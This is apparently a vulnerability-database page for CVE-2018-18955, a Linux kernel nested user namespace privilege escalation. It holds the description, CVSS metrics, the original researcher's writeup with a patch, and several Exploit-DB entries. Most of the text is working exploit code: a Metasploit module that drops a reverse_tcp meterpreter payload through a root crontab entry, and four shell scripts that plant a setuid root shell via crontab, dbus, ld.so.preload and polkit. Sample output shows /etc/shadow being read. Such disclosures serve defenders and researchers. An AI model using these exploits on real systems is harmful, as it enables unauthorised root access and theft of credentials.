CVE-2018-18955 Detail

CVE-2018-18955

Score / Severity

High

CVE Descriptions

In the Linux kernel 4.15.x through 4.19.x before 4.19.2, map_write() in kernel/user_namespace.c allows privilege escalation because it mishandles nested user namespaces with more than 5 UID or GID ranges. A user who has CAP_SYS_ADMIN in an affected user namespace can bypass access controls on resources outside the namespace, as demonstrated by reading /etc/shadow. This occurs because an ID transformation takes place properly for the namespaced-to-kernel direction but not for the kernel-to-namespaced direction.

CVE Informations

Related Weaknesses

CWE-ID	Weakness Name	Source
CWE-863	Incorrect Authorization The product performs an authorization check when an actor attempts to access a resource or perform an action, but it does not correctly perform the check.

Metrics

Metrics	Score	Severity	CVSS Vector	Source
V3.0	7	HIGH	CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H More informations Base: Exploitabilty Metrics The Exploitability metrics reflect the characteristics of the thing that is vulnerable, which we refer to formally as the vulnerable component. Attack Vector This metric reflects the context by which vulnerability exploitation is possible. Local A vulnerability exploitable with Local access means that the vulnerable component is not bound to the network stack, and the attacker's path is via read/write/execute capabilities. In some cases, the attacker may be logged in locally in order to exploit the vulnerability, otherwise, she may rely on User Interaction to execute a malicious file. Attack Complexity This metric describes the conditions beyond the attacker's control that must exist in order to exploit the vulnerability. High A successful attack depends on conditions beyond the attacker's control. That is, a successful attack cannot be accomplished at will, but requires the attacker to invest in some measurable amount of effort in preparation or execution against the vulnerable component before a successful attack can be expected. Privileges Required This metric describes the level of privileges an attacker must possess before successfully exploiting the vulnerability. Low The attacker is authorized with (i.e. requires) privileges that provide basic user capabilities that could normally affect only settings and files owned by a user. Alternatively, an attacker with Low privileges may have the ability to cause an impact only to non-sensitive resources. User Interaction This metric captures the requirement for a user, other than the attacker, to participate in the successful compromise of the vulnerable component. None The vulnerable system can be exploited without interaction from any user. Base: Scope Metrics An important property captured by CVSS v3.0 is the ability for a vulnerability in one software component to impact resources beyond its means, or privileges. Scope Formally, Scope refers to the collection of privileges defined by a computing authority (e.g. an application, an operating system, or a sandbox environment) when granting access to computing resources (e.g. files, CPU, memory, etc). These privileges are assigned based on some method of identification and authorization. In some cases, the authorization may be simple or loosely controlled based upon predefined rules or standards. For example, in the case of Ethernet traffic sent to a network switch, the switch accepts traffic that arrives on its ports and is an authority that controls the traffic flow to other switch ports. Unchanged An exploited vulnerability can only affect resources managed by the same authority. In this case the vulnerable component and the impacted component are the same. Base: Impact Metrics The Impact metrics refer to the properties of the impacted component. Confidentiality Impact This metric measures the impact to the confidentiality of the information resources managed by a software component due to a successfully exploited vulnerability. High There is total loss of confidentiality, resulting in all resources within the impacted component being divulged to the attacker. Alternatively, access to only some restricted information is obtained, but the disclosed information presents a direct, serious impact. For example, an attacker steals the administrator's password, or private encryption keys of a web server. Integrity Impact This metric measures the impact to integrity of a successfully exploited vulnerability. Integrity refers to the trustworthiness and veracity of information. High There is a total loss of integrity, or a complete loss of protection. For example, the attacker is able to modify any/all files protected by the impacted component. Alternatively, only some files can be modified, but malicious modification would present a direct, serious consequence to the impacted component. Availability Impact This metric measures the impact to the availability of the impacted component resulting from a successfully exploited vulnerability. High There is total loss of availability, resulting in the attacker being able to fully deny access to resources in the impacted component; this loss is either sustained (while the attacker continues to deliver the attack) or persistent (the condition persists even after the attack has completed). Alternatively, the attacker has the ability to deny some availability, but the loss of availability presents a direct, serious consequence to the impacted component (e.g., the attacker cannot disrupt existing connections, but can prevent new connections; the attacker can repeatedly exploit a vulnerability that, in each instance of a successful attack, leaks a only small amount of memory, but after repeated exploitation causes a service to become completely unavailable). Temporal Metrics The Temporal metrics measure the current state of exploit techniques or code availability, the existence of any patches or workarounds, or the confidence that one has in the description of a vulnerability. Environmental Metrics	[email protected]
V2	4.4		AV:L/AC:M/Au:N/C:P/I:P/A:P	[email protected]

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

EPSS First.org

Exploit information

Exploit Database EDB-ID : 45886

Publication date : 2018-11-15 23h00 +00:00
Author : Google Security Research
EDB Verified : Yes

commit 6397fac4915a ("userns: bump idmap limits to 340") increases the number of possible uid/gid mappings that a namespace can have from 5 to 340. This is implemented by switching to a different data structure if the number of mappings exceeds 5: Instead of linear search over an unsorted array of struct uid_gid_extent, binary search over a sorted array of struct uid_gid_extent is used. Because ID mappings are queried in both directions (kernel ID to namespaced ID and namespaced ID to kernel ID), two copies of the array are created, one per direction, and they are sorted differently. In map_write(), at first, during the loop that calls insert_extent(), the member lower_first of each struct uid_gid_extent contains an ID in the parent namespace. Later, map_id_range_down() is used in a loop to replace these IDs in the parent namespace with kernel IDs. The problem is that, when the two sorted arrays are used, the new code omits the ID transformation for the kernel->namespaced mapping; only the namespaced->kernel mapping is transformed appropriately. This means that if you first, from the init namespace, create a user namespace NS1 with the following uid_map: 0 100000 1000 and then, from NS1, create a nested user namespace NS2 with the following uid_map: 0 0 1 1 1 1 2 2 1 3 3 1 4 4 1 5 5 995 then make_kuid(NS2, ...) will work properly, but from_kuid(NS2) will be an identity mapping for UIDs in the range 0..1000. Most users of from_kuid() are relatively boring, but kuid_has_mapping() is used in inode_owner_or_capable() and privileged_wrt_inode_uidgid(); so you can abuse this to gain the ability to override DAC security controls on files whose IDs aren't mapped in your namespace. To test this, I installed the "uidmap" package in a Ubuntu 18.04 VM with the following /etc/subuid and /etc/subgid: user@ubuntu-18-04-vm:~$ cat /etc/subuid user:100000:65536 user2:165536:65536 user3:231072:65536 user@ubuntu-18-04-vm:~$ cat /etc/subgid user:100000:65536 user2:165536:65536 user3:231072:65536 user@ubuntu-18-04-vm:~$ Then, as the user "user", I compiled the two attached helpers (subuid_shell.c and subshell.c): user@ubuntu-18-04-vm:~/userns_4_15$ gcc -o subuid_shell subuid_shell.c user@ubuntu-18-04-vm:~/userns_4_15$ gcc -o subshell subshell.c subuid_shell.c uses the newuidmap helper to set up a namespace that maps 1000 UIDs starting at 100000 to the namespaced UID 0; subshell.c requires namespaced CAP_SYS_ADMIN and creates a user namespace that maps UIDs 0-999, using six extents. I used them as follows to read /etc/shadow: user@ubuntu-18-04-vm:~/userns_4_15$ id uid=1000(user) gid=1000(user) groups=1000(user),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),116(lpadmin),126(sambashare) user@ubuntu-18-04-vm:~/userns_4_15$ ls -l /etc/shadow -rw-r----- 1 root shadow 1519 Jul 4 16:11 /etc/shadow user@ubuntu-18-04-vm:~/userns_4_15$ head -n1 /etc/shadow head: cannot open '/etc/shadow' for reading: Permission denied user@ubuntu-18-04-vm:~/userns_4_15$ ./subuid_shell root@ubuntu-18-04-vm:~/userns_4_15# id uid=0(root) gid=0(root) groups=0(root),65534(nogroup) root@ubuntu-18-04-vm:~/userns_4_15# cat /proc/self/uid_map 0 100000 1000 root@ubuntu-18-04-vm:~/userns_4_15# ls -l /etc/shadow -rw-r----- 1 nobody nogroup 1519 Jul 4 16:11 /etc/shadow root@ubuntu-18-04-vm:~/userns_4_15# head -n1 /etc/shadow head: cannot open '/etc/shadow' for reading: Permission denied root@ubuntu-18-04-vm:~/userns_4_15# ./subshell nobody@ubuntu-18-04-vm:~/userns_4_15$ id uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),116(lpadmin),126(sambashare) nobody@ubuntu-18-04-vm:~/userns_4_15$ cat /proc/self/uid_map 0 0 1 1 1 1 2 2 1 3 3 1 4 4 1 5 5 995 nobody@ubuntu-18-04-vm:~/userns_4_15$ ls -l /etc/shadow -rw-r----- 1 root shadow 1519 Jul 4 16:11 /etc/shadow nobody@ubuntu-18-04-vm:~/userns_4_15$ head -n1 /etc/shadow root:!:17696:0:99999:7::: nobody@ubuntu-18-04-vm:~/userns_4_15$ Here is a suggested patch (copy attached to avoid whitespace issues); does this look sensible? ================== From 20598025d5e80f26a0c4306ebeca14b31539bd97 Mon Sep 17 00:00:00 2001 From: Jann Horn <[email protected]> Date: Mon, 5 Nov 2018 20:55:09 +0100 Subject: [PATCH] userns: also map extents in the reverse map to kernel IDs The current logic first clones the extent array and sorts both copies, then maps the lower IDs of the forward mapping into the lower namespace, but doesn't map the lower IDs of the reverse mapping. This means that code in a nested user namespace with >5 extents will see incorrect IDs. It also breaks some access checks, like inode_owner_or_capable() and privileged_wrt_inode_uidgid(), so a process can incorrectly appear to be capable relative to an inode. To fix it, we have to make sure that the "lower_first" members of extents in both arrays are translated; and we have to make sure that the reverse map is sorted *after* the translation (since otherwise the translation can break the sorting). This is CVE-2018-18955. Fixes: 6397fac4915a ("userns: bump idmap limits to 340") Cc: [email protected] Signed-off-by: Jann Horn <[email protected]> --- kernel/user_namespace.c | 12 ++++++++---- 1 file changed, 8 insertions(+), 4 deletions(-) diff --git a/kernel/user_namespace.c b/kernel/user_namespace.c index e5222b5fb4fe..923414a246e9 100644 --- a/kernel/user_namespace.c +++ b/kernel/user_namespace.c @@ -974,10 +974,6 @@ static ssize_t map_write(struct file *file, const char __user *buf, if (!new_idmap_permitted(file, ns, cap_setid, &new_map)) goto out; - ret = sort_idmaps(&new_map); - if (ret < 0) - goto out; - ret = -EPERM; /* Map the lower ids from the parent user namespace to the * kernel global id space. @@ -1004,6 +1000,14 @@ static ssize_t map_write(struct file *file, const char __user *buf, e->lower_first = lower_first; } + /* + * If we want to use binary search for lookup, this clones the extent + * array and sorts both copies. + */ + ret = sort_idmaps(&new_map); + if (ret < 0) + goto out; + /* Install the map */ if (new_map.nr_extents <= UID_GID_MAP_MAX_BASE_EXTENTS) { memcpy(map->extent, new_map.extent, -- 2.19.1.930.g4563a0d9d0-goog ================== (By the way: map_id_up_max() is probably pretty inefficient, especially when retpoline mitigations are on, because it uses bsearch(), which is basically a little bit of logic glue around indirect function calls. If you care about speed, you might want to add an inline variant of bsearch() for places like this.) Proof of Concept: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/45886.zip

Exploit Database EDB-ID : 45915

Publication date : 2018-11-28 23h00 +00:00
Author : Metasploit
EDB Verified : Yes

## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Local Rank = GreatRanking include Msf::Post::Linux::Priv include Msf::Post::Linux::System include Msf::Post::Linux::Kernel include Msf::Post::File include Msf::Exploit::EXE include Msf::Exploit::FileDropper def initialize(info = {}) super(update_info(info, 'Name' => 'Linux Nested User Namespace idmap Limit Local Privilege Escalation', 'Description' => %q{ This module exploits a vulnerability in Linux kernels 4.15.0 to 4.18.18, and 4.19.0 to 4.19.1, where broken uid/gid mappings between nested user namespaces and kernel uid/gid mappings allow elevation to root (CVE-2018-18955). The target system must have unprivileged user namespaces enabled and the newuidmap and newgidmap helpers installed (from uidmap package). This module has been tested successfully on: Fedora Workstation 28 kernel 4.16.3-301.fc28.x86_64; Kubuntu 18.04 LTS kernel 4.15.0-20-generic (x86_64); Linux Mint 19 kernel 4.15.0-20-generic (x86_64); Ubuntu Linux 18.04.1 LTS kernel 4.15.0-20-generic (x86_64). }, 'License' => MSF_LICENSE, 'Author' => [ 'Jann Horn', # Discovery and exploit 'bcoles' # Metasploit ], 'DisclosureDate' => 'Nov 15 2018', 'Platform' => ['linux'], 'Arch' => [ARCH_X86, ARCH_X64], 'SessionTypes' => ['shell', 'meterpreter'], 'Targets' => [['Auto', {}]], 'Privileged' => true, 'References' => [ ['BID', '105941'], ['CVE', '2018-18955'], ['EDB', '45886'], ['PACKETSTORM', '150381'], ['URL', 'https://bugs.chromium.org/p/project-zero/issues/detail?id=1712'], ['URL', 'https://github.com/bcoles/kernel-exploits/tree/master/CVE-2018-18955'], ['URL', 'https://lwn.net/Articles/532593/'], ['URL', 'https://bugs.launchpad.net/bugs/1801924'], ['URL', 'https://people.canonical.com/~ubuntu-security/cve/CVE-2018-18955'], ['URL', 'https://security-tracker.debian.org/tracker/CVE-2018-18955'], ['URL', 'https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=d2f007dbe7e4c9583eea6eb04d60001e85c6f1bd'], ['URL', 'https://cdn.kernel.org/pub/linux/kernel/v4.x/ChangeLog-4.18.19'], ['URL', 'https://cdn.kernel.org/pub/linux/kernel/v4.x/ChangeLog-4.19.2'] ], 'DefaultTarget' => 0, 'DefaultOptions' => { 'AppendExit' => true, 'PrependSetresuid' => true, 'PrependSetreuid' => true, 'PrependSetuid' => true, 'PrependFork' => true, 'WfsDelay' => 60, 'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp' }, 'Notes' => { 'AKA' => ['subuid_shell.c'] } )) register_options [ OptEnum.new('COMPILE', [true, 'Compile on target', 'Auto', %w[Auto True False]]) ] register_advanced_options [ OptBool.new('ForceExploit', [false, 'Override check result', false]), OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp']) ] end def base_dir datastore['WritableDir'].to_s end def upload(path, data) print_status "Writing '#{path}' (#{data.size} bytes) ..." rm_f path write_file path, data register_file_for_cleanup path end def upload_and_chmodx(path, data) upload path, data chmod path end def upload_and_compile(path, data) upload "#{path}.c", data gcc_cmd = "gcc -o #{path} #{path}.c" if session.type.eql? 'shell' gcc_cmd = "PATH=$PATH:/usr/bin/ #{gcc_cmd}" end output = cmd_exec gcc_cmd unless output.blank? print_error output fail_with Failure::Unknown, "#{path}.c failed to compile. Set COMPILE False to upload a pre-compiled executable." end register_file_for_cleanup path chmod path, 0755 end def exploit_data(file) ::File.binread ::File.join(Msf::Config.data_directory, 'exploits', 'cve-2018-18955', file) end def live_compile? return false unless datastore['COMPILE'].eql?('Auto') || datastore['COMPILE'].eql?('True') if has_gcc? vprint_good 'gcc is installed' return true end unless datastore['COMPILE'].eql? 'Auto' fail_with Failure::BadConfig, 'gcc is not installed. Compiling will fail.' end end def check unless userns_enabled? vprint_error 'Unprivileged user namespaces are not permitted' return CheckCode::Safe end vprint_good 'Unprivileged user namespaces are permitted' ['/usr/bin/newuidmap', '/usr/bin/newgidmap'].each do |path| unless setuid? path vprint_error "#{path} is not set-uid" return CheckCode::Safe end vprint_good "#{path} is set-uid" end # Patched in 4.18.19 and 4.19.2 release = kernel_release v = Gem::Version.new release.split('-').first if v < Gem::Version.new('4.15') || v >= Gem::Version.new('4.19.2') || (v >= Gem::Version.new('4.18.19') && v < Gem::Version.new('4.19')) vprint_error "Kernel version #{release} is not vulnerable" return CheckCode::Safe end vprint_good "Kernel version #{release} appears to be vulnerable" CheckCode::Appears end def on_new_session(session) if session.type.to_s.eql? 'meterpreter' session.core.use 'stdapi' unless session.ext.aliases.include? 'stdapi' session.sys.process.execute '/bin/sh', "-c \"/bin/sed -i '\$ d' /etc/crontab\"" else session.shell_command("/bin/sed -i '\$ d' /etc/crontab") end ensure super end def exploit unless check == CheckCode::Appears unless datastore['ForceExploit'] fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.' end print_warning 'Target does not appear to be vulnerable' end if is_root? unless datastore['ForceExploit'] fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.' end end unless writable? base_dir fail_with Failure::BadConfig, "#{base_dir} is not writable" end # Upload executables subuid_shell_name = ".#{rand_text_alphanumeric 5..10}" subuid_shell_path = "#{base_dir}/#{subuid_shell_name}" subshell_name = ".#{rand_text_alphanumeric 5..10}" subshell_path = "#{base_dir}/#{subshell_name}" if live_compile? vprint_status 'Live compiling exploit on system...' upload_and_compile subuid_shell_path, exploit_data('subuid_shell.c') upload_and_compile subshell_path, exploit_data('subshell.c') else vprint_status 'Dropping pre-compiled exploit on system...' upload_and_chmodx subuid_shell_path, exploit_data('subuid_shell.out') upload_and_chmodx subshell_path, exploit_data('subshell.out') end # Upload payload executable payload_path = "#{base_dir}/.#{rand_text_alphanumeric 5..10}" upload_and_chmodx payload_path, generate_payload_exe # Launch exploit print_status 'Adding cron job...' output = cmd_exec "echo \"echo '* * * * * root #{payload_path}' >> /etc/crontab\" | #{subuid_shell_path} #{subshell_path} " output.each_line { |line| vprint_status line.chomp } crontab = read_file '/etc/crontab' unless crontab.include? payload_path fail_with Failure::Unknown, 'Failed to add cronjob' end print_good 'Success. Waiting for job to run (may take a minute)...' end end

Exploit Database EDB-ID : 47164

Publication date : 2018-11-20 23h00 +00:00
Author : bcoles
EDB Verified : No

#!/bin/sh # # EDB Note: Download ~ https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47164.zip # # wrapper for Jann Horn's exploit for CVE-2018-18955 # uses crontab technique # --- # test@linux-mint-19-2:~/kernel-exploits/CVE-2018-18955$ ./exploit.cron.sh # [*] Compiling... # [*] Writing payload to /tmp/payload... # [*] Adding cron job... (wait a minute) # [.] starting # [.] setting up namespace # [~] done, namespace sandbox set up # [.] mapping subordinate ids # [.] subuid: 165536 # [.] subgid: 165536 # [~] done, mapped subordinate ids # [.] executing subshell # [+] Success: # -rwsrwxr-x 1 root root 8384 Nov 21 19:47 /tmp/sh # [*] Cleaning up... # [!] Remember to clean up /etc/crontab # [*] Launching root shell: /tmp/sh # root@linux-mint-19-2:~/kernel-exploits/CVE-2018-18955# id # uid=0(root) gid=0(root) groups=0(root),1001(test) rootshell="/tmp/sh" bootstrap="/tmp/payload" command_exists() { command -v "${1}" >/dev/null 2>/dev/null } if ! command_exists gcc; then echo '[-] gcc is not installed' exit 1 fi if ! command_exists /usr/bin/newuidmap; then echo '[-] newuidmap is not installed' exit 1 fi if ! command_exists /usr/bin/newgidmap; then echo '[-] newgidmap is not installed' exit 1 fi if ! test -w .; then echo '[-] working directory is not writable' exit 1 fi echo "[*] Compiling..." if ! gcc subuid_shell.c -o subuid_shell; then echo 'Compiling subuid_shell.c failed' exit 1 fi if ! gcc subshell.c -o subshell; then echo 'Compiling gcc_subshell.c failed' exit 1 fi if ! gcc rootshell.c -o "${rootshell}"; then echo 'Compiling rootshell.c failed' exit 1 fi echo "[*] Writing payload to ${bootstrap}..." echo "#!/bin/sh\n/bin/chown root:root ${rootshell};/bin/chmod u+s ${rootshell}" > $bootstrap /bin/chmod +x "${bootstrap}" echo "[*] Adding cron job... (wait a minute)" echo "echo '* * * * * root ${bootstrap}' >> /etc/crontab" | ./subuid_shell ./subshell sleep 60 if ! test -u "${rootshell}"; then echo '[-] Failed' /bin/rm "${rootshell}" /bin/rm "${bootstrap}" exit 1 fi echo '[+] Success:' ls -la "${rootshell}" echo '[*] Cleaning up...' /bin/rm "${bootstrap}" /bin/rm subuid_shell /bin/rm subshell if command_exists /bin/sed; then echo "/bin/sed -i '\$ d' /etc/crontab" | $rootshell else echo "[!] Manual clean up of /etc/crontab required" fi echo "[*] Launching root shell: ${rootshell}" $rootshell

Exploit Database EDB-ID : 47165

Publication date : 2019-01-03 23h00 +00:00
Author : bcoles
EDB Verified : No

#!/bin/sh # # EDB Note: Download ~ https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47165.zip # # wrapper for Jann Horn's exploit for CVE-2018-18955 # uses dbus service technique # --- # test@linux-mint-19-2:~/kernel-exploits/CVE-2018-18955$ ./exploit.dbus.sh # [*] Compiling... # [*] Creating /usr/share/dbus-1/system-services/org.subuid.Service.service... # [.] starting # [.] setting up namespace # [~] done, namespace sandbox set up # [.] mapping subordinate ids # [.] subuid: 165536 # [.] subgid: 165536 # [~] done, mapped subordinate ids # [.] executing subshell # [*] Creating /etc/dbus-1/system.d/org.subuid.Service.conf... # [.] starting # [.] setting up namespace # [~] done, namespace sandbox set up # [.] mapping subordinate ids # [.] subuid: 165536 # [.] subgid: 165536 # [~] done, mapped subordinate ids # [.] executing subshell # [*] Launching dbus service... # Error org.freedesktop.DBus.Error.NoReply: Did not receive a reply. Possible causes include: the remote application did not send a reply, the message bus security policy blocked the reply, the reply timeout expired, or the network connection was broken. # [+] Success: # -rwsrwxr-x 1 root root 8384 Jan 4 18:31 /tmp/sh # [*] Cleaning up... # [*] Launching root shell: /tmp/sh # root@linux-mint-19-2:~/kernel-exploits/CVE-2018-18955# id # uid=0(root) gid=0(root) groups=0(root),1001(test) rootshell="/tmp/sh" service="org.subuid.Service" command_exists() { command -v "${1}" >/dev/null 2>/dev/null } if ! command_exists gcc; then echo '[-] gcc is not installed' exit 1 fi if ! command_exists /usr/bin/dbus-send; then echo '[-] dbus-send is not installed' exit 1 fi if ! command_exists /usr/bin/newuidmap; then echo '[-] newuidmap is not installed' exit 1 fi if ! command_exists /usr/bin/newgidmap; then echo '[-] newgidmap is not installed' exit 1 fi if ! test -w .; then echo '[-] working directory is not writable' exit 1 fi echo "[*] Compiling..." if ! gcc subuid_shell.c -o subuid_shell; then echo 'Compiling subuid_shell.c failed' exit 1 fi if ! gcc subshell.c -o subshell; then echo 'Compiling gcc_subshell.c failed' exit 1 fi if ! gcc rootshell.c -o "${rootshell}"; then echo 'Compiling rootshell.c failed' exit 1 fi echo "[*] Creating /usr/share/dbus-1/system-services/${service}.service..." cat << EOF > "${service}.service" [D-BUS Service] Name=${service} Exec=/bin/sh -c "/bin/chown root:root ${rootshell};/bin/chmod u+s ${rootshell}" User=root EOF echo "cp ${service}.service /usr/share/dbus-1/system-services/${service}.service" | ./subuid_shell ./subshell if ! test -r "/usr/share/dbus-1/system-services/${service}.service"; then echo '[-] Failed' /bin/rm "${rootshell}" exit 1 fi echo "[*] Creating /etc/dbus-1/system.d/${service}.conf..." cat << EOF > "${service}.conf" <!DOCTYPE busconfig PUBLIC "-//freedesktop//DTD D-BUS Bus Configuration 1.0//EN" "http://www.freedesktop.org/standards/dbus/1.0/busconfig.dtd"> <busconfig> <policy context="default"> <allow send_destination="${service}"/> </policy> </busconfig> EOF echo "cp ${service}.conf /etc/dbus-1/system.d/${service}.conf" | ./subuid_shell ./subshell if ! test -r "/etc/dbus-1/system.d/${service}.conf"; then echo '[-] Failed' /bin/rm "${rootshell}" exit 1 fi echo "[*] Launching dbus service..." /usr/bin/dbus-send --system --print-reply --dest="${service}" --type=method_call --reply-timeout=1 / "${service}" sleep 1 if ! test -u "${rootshell}"; then echo '[-] Failed' /bin/rm "${rootshell}" exit 1 fi echo '[+] Success:' /bin/ls -la "${rootshell}" echo '[*] Cleaning up...' /bin/rm subuid_shell /bin/rm subshell /bin/rm "${service}.conf" /bin/rm "${service}.service" echo "/bin/rm /usr/share/dbus-1/system-services/${service}.service" | $rootshell echo "/bin/rm /etc/dbus-1/system.d/${service}.conf" | $rootshell echo "[*] Launching root shell: ${rootshell}" $rootshell

Exploit Database EDB-ID : 47166

Publication date : 2018-11-20 23h00 +00:00
Author : bcoles
EDB Verified : No

#!/bin/sh # # EDB Note: Download ~ https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47166.zip # # wrapper for Jann Horn's exploit for CVE-2018-18955 # uses ld.so.preload technique # --- # test@linux-mint-19-2:~/kernel-exploits/CVE-2018-18955$ ./exploit.ldpreload.sh # [*] Compiling... # [*] Adding libsubuid.so to /etc/ld.so.preload... # [.] starting # [.] setting up namespace # [~] done, namespace sandbox set up # [.] mapping subordinate ids # [.] subuid: 165536 # [.] subgid: 165536 # [~] done, mapped subordinate ids # [.] executing subshell # [+] Success: # -rwsrwxr-x 1 root root 8384 Nov 21 19:07 /tmp/sh # [*] Launching root shell: /tmp/sh # root@linux-mint-19-2:~/kernel-exploits/CVE-2018-18955# id # uid=0(root) gid=0(root) groups=0(root),1001(test) rootshell="/tmp/sh" lib="libsubuid.so" command_exists() { command -v "${1}" >/dev/null 2>/dev/null } if ! command_exists gcc; then echo '[-] gcc is not installed' exit 1 fi if ! command_exists /usr/bin/newuidmap; then echo '[-] newuidmap is not installed' exit 1 fi if ! command_exists /usr/bin/newgidmap; then echo '[-] newgidmap is not installed' exit 1 fi if ! test -w .; then echo '[-] working directory is not writable' exit 1 fi echo "[*] Compiling..." if ! gcc subuid_shell.c -o subuid_shell; then echo 'Compiling subuid_shell.c failed' exit 1 fi if ! gcc subshell.c -o subshell; then echo 'Compiling gcc_subshell.c failed' exit 1 fi if ! gcc rootshell.c -o "${rootshell}"; then echo 'Compiling rootshell.c failed' exit 1 fi if ! gcc libsubuid.c -fPIC -shared -o "${lib}"; then echo 'Compiling libsubuid.c failed' exit 1 fi echo "[*] Adding ${lib} to /etc/ld.so.preload..." echo "cp ${lib} /lib/; echo /lib/${lib} > /etc/ld.so.preload" | ./subuid_shell ./subshell /usr/bin/newuidmap if ! test -u "${rootshell}"; then echo '[-] Failed' /bin/rm "${rootshell}" exit 1 fi echo '[+] Success:' /bin/ls -la "${rootshell}" echo '[*] Cleaning up...' /bin/rm subuid_shell /bin/rm subshell echo "/bin/rm /lib/${lib}" | $rootshell echo "[*] Launching root shell: ${rootshell}" $rootshell

Exploit Database EDB-ID : 47167

Publication date : 2019-01-03 23h00 +00:00
Author : bcoles
EDB Verified : No

#!/bin/sh # # EDB Note: Download ~ https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47167.zip # # wrapper for Jann Horn's exploit for CVE-2018-18955 # uses polkit technique # --- # test@linux-mint-19-2:~/kernel-exploits/CVE-2018-18955$ ./exploit.polkit.sh # [*] Compiling... # [*] Creating /usr/share/polkit-1/actions/subuid.policy... # [.] starting # [.] setting up namespace # [~] done, namespace sandbox set up # [.] mapping subordinate ids # [.] subuid: 165536 # [.] subgid: 165536 # [~] done, mapped subordinate ids # [.] executing subshell # [*] Launching pkexec... # [+] Success: # -rwsrwxr-x 1 root root 8384 Dec 29 14:22 /tmp/sh # [*] Cleaning up... # [*] Launching root shell: /tmp/sh # root@linux-mint-19-2:~/kernel-exploits/CVE-2018-18955# id # uid=0(root) gid=0(root) groups=0(root),1001(test) rootshell="/tmp/sh" policy="subuid.policy" command_exists() { command -v "${1}" >/dev/null 2>/dev/null } if ! command_exists gcc; then echo '[-] gcc is not installed' exit 1 fi if ! command_exists /usr/bin/pkexec; then echo '[-] pkexec is not installed' exit 1 fi if ! command_exists /usr/bin/newuidmap; then echo '[-] newuidmap is not installed' exit 1 fi if ! command_exists /usr/bin/newgidmap; then echo '[-] newgidmap is not installed' exit 1 fi if ! test -w .; then echo '[-] working directory is not writable' exit 1 fi echo "[*] Compiling..." if ! gcc subuid_shell.c -o subuid_shell; then echo 'Compiling subuid_shell.c failed' exit 1 fi if ! gcc subshell.c -o subshell; then echo 'Compiling gcc_subshell.c failed' exit 1 fi if ! gcc rootshell.c -o "${rootshell}"; then echo 'Compiling rootshell.c failed' exit 1 fi echo "[*] Creating /usr/share/polkit-1/actions/${policy}..." echo '<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE policyconfig PUBLIC "-//freedesktop//DTD PolicyKit Policy Configuration 1.0//EN" "http://www.freedesktop.org/standards/PolicyKit/1/policyconfig.dtd"> <policyconfig> <action id="org.freedesktop.policykit.exec"> <defaults> <allow_any>yes</allow_any> <allow_inactive>yes</allow_inactive> <allow_active>yes</allow_active> </defaults> </action> </policyconfig>' > "${policy}" echo "cp ${policy} /usr/share/polkit-1/actions/${policy}" | ./subuid_shell ./subshell if ! test -r "/usr/share/polkit-1/actions/${policy}"; then echo '[-] Failed' /bin/rm "${rootshell}" exit 1 fi echo "[*] Launching pkexec..." /usr/bin/pkexec --disable-internal-agent 2>/dev/null /bin/sh -c "/bin/chown root:root ${rootshell};/bin/chmod u+s ${rootshell}" if ! test -u "${rootshell}"; then echo '[-] Failed' /bin/rm "${rootshell}" exit 1 fi echo '[+] Success:' /bin/ls -la "${rootshell}" echo '[*] Cleaning up...' /bin/rm subuid_shell /bin/rm subshell /bin/rm "${policy}" echo "/bin/rm /usr/share/polkit-1/actions/${policy}" | $rootshell echo "[*] Launching root shell: ${rootshell}" $rootshell